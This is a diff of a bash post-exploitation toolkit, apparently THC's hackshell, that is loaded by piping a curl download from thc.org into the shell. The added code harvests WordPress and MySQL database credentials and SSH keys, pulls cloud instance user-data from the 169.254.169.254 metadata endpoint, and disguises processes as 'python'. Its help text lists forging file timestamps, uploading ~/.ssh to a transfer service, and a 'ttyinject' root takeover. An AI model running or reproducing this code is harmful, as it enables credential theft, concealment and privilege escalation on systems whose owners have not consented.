@@ -129,9 +129,11 @@ notime() {
129129# Set the ctime to the file's mtime
130130ctime () {
131131 local fn
132+ [ " $UID " -ne 0 ] && { HS_ERR " Need root" ; return 255; }
132133
133134 for fn in " $@ " ; do
134135 notime " ${fn} " " ${fn} " " ${fn} "
136+ # FIXME: warning if Birth time is newer than ctime or mtime.
135137 done
136138}
137139
@@ -401,9 +403,14 @@ np() {
401403}
402404
403405zapme () {
406+ local name=" ${1} "
404407 _hs_dep zapper || return
405- HS_WARN " Starting new/zapper SHELL. Type '${CDC} source <(curl -SsfL https://thc.org/hs)${CDM} ' again."
406- exec zapper -f -a" ${1:- -} "
408+ HS_WARN " Starting new/zap'ed shell. Type '${CDC} source <(curl -SsfL https://thc.org/hs)${CDM} ' again."
409+ [ -z " $name " && {
410+ HS_INFO " Apps will hide as ${CDY} python${CDM} . Use ${CDC} zapme -${CDM} for NO name."
411+ name=" python"
412+ }
413+ exec zapper -f -a" ${name} "
407414}
408415
409416# Find writeable dirctory but without displaying sub-folders
@@ -424,7 +431,7 @@ wfind() {
424431
425432# Only output the 16 charges before and 32 chars after..
426433hgrep () {
427- grep -HEronasi " .{,16}${1:- password} .{,32}" .
434+ grep -HEronasie " .{,16}${1:- password} .{,32}" .
428435}
429436
430437dbin () {
@@ -566,6 +573,18 @@ loot_bitrix() {
566573 echo -en " ${CN} "
567574}
568575
576+ _loot_wp () {
577+ local fn=" ${1:? } "
578+ local str
579+ [ ! -f " $fn " && return
580+
581+ str=" $( grep -v ^# "$fn" | grep -E "DB_(NAME|USER|PASSWORD|HOST)")"
582+ [[ " $str " == * " _here" * ]] && return
583+ echo -e " ${CB} WordPress-DB ${CDY}${fn}${CF} "
584+ echo " ${str} "
585+ echo -en " ${CN} "
586+ }
587+
569588# _loot_home <NAME> <filename>
570589_loot_homes () {
571590 local fn
@@ -579,18 +598,23 @@ _loot_homes() {
579598
580599_loot_openstack () {
581600 local str
601+ local rv
582602
583603 [ -n " $_HS_NOT_OPENSTACK " && return
584604 [ -n " $_HS_NO_SSRF_169 " && return
605+ [ -n " $_HS_GOT_SSRF_169 " && return
585606
586607 str=" $( timeout 4 bash -c " $( declare -f dl) " 2> /dev/null) " || {
587- [ " $? " -eq 124 ] && _HS_NO_SSRF_169=1
608+ rv=" $? "
609+ { [ " ${rv} " -eq 124 ] || [ " ${rv} " -eq 7 ]; } && _HS_NO_SSRF_169=1
588610 unset str
589611 }
612+
590613 [ -z " $str " && {
591614 _HS_NOT_OPENSTACK=1
592615 return 255
593616 }
617+ _HS_GOT_SSRF_169=1
594618 echo -e " ${CB} OpenStack user_data${CDY}${CF} "
595619 echo " $str "
596620 echo -en " ${CN} "
@@ -603,14 +627,17 @@ _loot_aws() {
603627 local str
604628 local TOKEN
605629 local role
630+ local rv
606631
607632 [ -n " $_HS_NOT_AWS " && return
608633 [ -n " $_HS_NO_SSRF_169 " && return
634+ [ -n " $_HS_GOT_SSRF_169 " && return
609635
610636 command -v curl > /dev/null || return # AWS always has curl
611637
612638 str=" $( timeout 4 curl -SsfL -X PUT " http://169.254.169.254/latest/api/token" " X-aws-ec2-metadata-token-ttl-seconds: 60" 2> /dev/null) " || {
613- [ " $? " -eq 124 ] && _HS_NO_SSRF_169=1
639+ rv=" $? "
640+ { [ " ${rv} " -eq 124 ] || [ " ${rv} " -eq 7 ]; } && _HS_NO_SSRF_169=1
614641 unset str
615642 }
616643 [ -z " $str " && {
@@ -619,6 +646,7 @@ _loot_aws() {
619646 }
620647 TOKEN=" $str "
621648
649+ _HS_GOT_SSRF_169=1
622650 str=" $( curl -SsfL -H " X-aws-ec2-metadata-token: $TOKEN " 2> /dev/null) "
623651 [ -n " $str " && [[ " $str " != * Lightsail* ]] && {
624652 echo -e " ${CB} AWS user-data (config)${CDY}${CF} "
@@ -645,19 +673,23 @@ _loot_aws() {
645673
646674_loot_yandex () {
647675 local str
676+ local rv
648677
649678 [ -n " $_HS_NOT_YC " && return
650679 [ -n " $_HS_NO_SSRF_169 " && return
680+ [ -n " $_HS_GOT_SSRF_169 " && return
651681
652682 str=" $( timeout 4 bash -c " $( declare -f dl) " 2> /dev/null) " || {
653- [ " $? " -eq 124 ] && _HS_NO_SSRF_169=1
683+ rv=" $? "
684+ { [ " ${rv} " -eq 124 ] || [ " ${rv} " -eq 7 ]; } && _HS_NO_SSRF_169=1
654685 unset str
655686 }
656687 [ -z " $str " && {
657688 _HS_NOT_YC=1
658689 return 255
659690 }
660691
692+ _HS_GOT_SSRF_169=1
661693 echo -e " ${CB} Yandex Cloud user-data (config)${CDY}${CF} "
662694 echo " $str "
663695 echo -en " ${CN} "
@@ -715,6 +747,7 @@ loot() {
715747 local h=" ${_HS_HOME_ORIG:- $HOME } "
716748 local str
717749
750+ unset _HS_GOT_SSRF_169
718751 for fn in " ${HOMEDIR:-/ home} " * /.my.cnf /root/.my.cnf; do
719752 [ ! -s " $fn " && continue
720753 echo -e " ${CB} MySQL ${CDY}${fn}${CF} "
@@ -739,6 +772,10 @@ loot() {
739772 loot_bitrix " $fn "
740773 done
741774
775+ find /var/www " ${h} " 2> /dev/null | while read -r fn; do
776+ _loot_wp " $fn "
777+ done
778+
742779 # ## SSH Keys
743780 [ -e " /etc/ansible/ansible.cfg" && {
744781 str=" $( grep ^private_key_file " /etc/ansible/ansible.cfg" ) "
@@ -766,11 +803,16 @@ loot() {
766803 _loot_openstack
767804 _loot_aws
768805 _loot_yandex
806+
769807 [ -z " $_HS_NO_SSRF_169 " && {
770808 # Found an SSRF
771809 echo -e " ${CW} TIP:${CN} See ${CB}${CUL} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf${CN} "
772810 }
773811
812+ [ " $UID " -ne 0 ] && {
813+ echo -e " ${CW} TIP:${CN} Type ${CDC} sudo -ln${CN} to list sudo perms. ${CF} [may log to auth.log]${CN} "
814+ }
815+
774816 lootlight
775817}
776818
@@ -882,7 +924,7 @@ hs_exit() {
882924 _hs_destruct
883925 fi
884926 }
885- [ -t 1 ] && echo -e " ${CW} >>>>> 📖 More tips at https://thc.lorg /tips${CN} 😘"
927+ [ -t 1 ] && echo -e " ${CW} >>>>> 📖 More tips at https://thc.org /tips${CN} 😘"
886928 kill -9 $$
887929}
888930
@@ -1092,7 +1134,7 @@ ${CDC} burl http://ipinfo.io 2>/dev/null ${CDM}Request URL ${CN}${CF}[no htt
10921134${CDC} dl http://ipinfo.io 2>/dev/null ${CDM} Request URL using one of curl/wget/python
10931135${CDC} transfer ~/.ssh ${CDM} Upload a file or directory ${CN}${CF} [${HS_TRANSFER_PROVIDER} ]
10941136${CDC} shred file ${CDM} Securely delete a file
1095- ${CDC} notime <file> rm -f foo.dat ${CDM} Execute a command at the <file>'s ctime & mtime
1137+ ${CDC} notime <file> touch foo.dat ${CDM} Execute a command at the <file>'s mtime
10961138${CDC} notime_cp <src> <dst> ${CDM} Copy file. Keep birth-time, ctime, mtime & atime
10971139${CDC} ctime <file> ${CDM} Set ctime to file's mtime ${CN}${CF} [find . -ctime -1]
10981140${CDC} ttyinject ${CDM} Become root when root switches to ${USER:- this user}
0 commit comments